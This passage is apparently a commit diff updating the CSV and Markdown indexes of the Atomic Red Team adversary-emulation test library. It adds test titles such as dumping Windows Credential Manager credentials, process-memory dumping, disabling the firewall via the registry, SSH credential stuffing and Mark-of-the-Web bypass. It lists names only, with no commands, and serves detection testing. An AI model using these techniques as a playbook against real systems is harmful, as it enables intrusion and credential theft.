 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
@@ -74,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
@@ -157,6 +159,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
 command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
 command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
@@ -184,10 +186,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
@@ -214,7 +217,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System F
 defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
-defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
+defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
@@ -233,6 +236,8 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
@@ -411,6 +416,7 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -570,6 +576,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
 execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
@@ -598,6 +605,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -15,7 +15,9 @@
   - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
   - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
+  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
   - Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -24,6 +26,8 @@
   - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
   - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
   - Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -105,7 +109,9 @@
   - Atomic Test #2: Discover Private SSH Keys [macos, linux]
   - Atomic Test #3: Copy Private SSH Keys with CP [linux]
   - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
-- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
   - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
@@ -370,6 +376,7 @@
   - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
   - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -494,10 +501,11 @@
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
   - Atomic Test #1: Disable firewall [linux]
   - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
-  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
-  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
-  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
-  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+  - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+  - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+  - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+  - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #1: Disable syslog [linux]
   - Atomic Test #2: Disable Cb Response [linux]
@@ -571,7 +579,7 @@
   - Atomic Test #1: Hidden Window [windows]
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
   - Atomic Test #1: Extract binary files via VBA [windows]
-  - Atomic Test #2: Create a user called "$" as noted here [windows]
+  - Atomic Test #2: Create a Hidden User Called "$" [windows]
   - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
@@ -621,13 +629,16 @@
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
   - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+  - Atomic Test #1: Mount ISO image [windows]
+  - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
 - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
   - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
   - Atomic Test #1: System File Copied to Unusual Location [windows]
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
@@ -836,10 +847,12 @@
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+  - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
   - Atomic Test #1: Install AppInit Shim [windows]
@@ -871,7 +884,8 @@
   - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
-- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1013,6 +1027,7 @@
 - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
   - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1055,6 +1070,7 @@
   - Atomic Test #2: Encrypt files using 7z (Linux) [linux]
   - Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
   - Atomic Test #4: Encrypt files using openssl (Linux) [linux]
+  - Atomic Test #5: PureLocker Ransom Note [windows]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1432,7 +1448,8 @@
   - Atomic Test #1: Execute a Command as a Service [windows]
   - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
 - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
@@ -1487,7 +1504,8 @@
 - T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1535,6 +1553,7 @@
   - Atomic Test #11: OSTAP Worming Activity [windows]
   - Atomic Test #12: svchost writing a file to a UNC path [windows]
   - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [macos, linux]
   - Atomic Test #2: Connection Proxy for macOS UI [macos]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -11,7 +11,8 @@
 - [T1552.007 Container API](../../T1552.007/T1552.007.md)
   - Atomic Test #1: ListSecrets [macos, linux]
   - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #2: Extract passwords with grep [macos, linux]
   - Atomic Test #5: Find and Access Github Credentials [macos, linux]
@@ -37,7 +38,9 @@
   - Atomic Test #2: Discover Private SSH Keys [macos, linux]
   - Atomic Test #3: Copy Private SSH Keys with CP [linux]
   - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
-- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -137,6 +140,7 @@
   - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
   - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
 - [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -234,7 +238,8 @@
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -401,10 +406,12 @@
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 
 # persistence
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+  - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
 - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
   - Atomic Test #1: At - Schedule a job [linux]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -414,7 +421,8 @@
   - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
-- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
@@ -466,6 +474,7 @@
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
   - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -603,6 +612,7 @@
   - Atomic Test #4: scp remote file copy (pull) [linux, macos]
   - Atomic Test #5: sftp remote file copy (push) [linux, macos]
   - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [macos, linux]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -4,7 +4,8 @@
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
   - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
   - Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -202,7 +203,8 @@
   - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
   - Atomic Test #1: Decode base64 Data into Script [macos, linux]
@@ -454,6 +456,7 @@
   - Atomic Test #4: scp remote file copy (pull) [linux, macos]
   - Atomic Test #5: sftp remote file copy (push) [linux, macos]
   - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [macos, linux]
   - Atomic Test #2: Connection Proxy for macOS UI [macos]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -12,6 +12,8 @@
   - Atomic Test #4: Access unattend.xml [windows]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
   - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
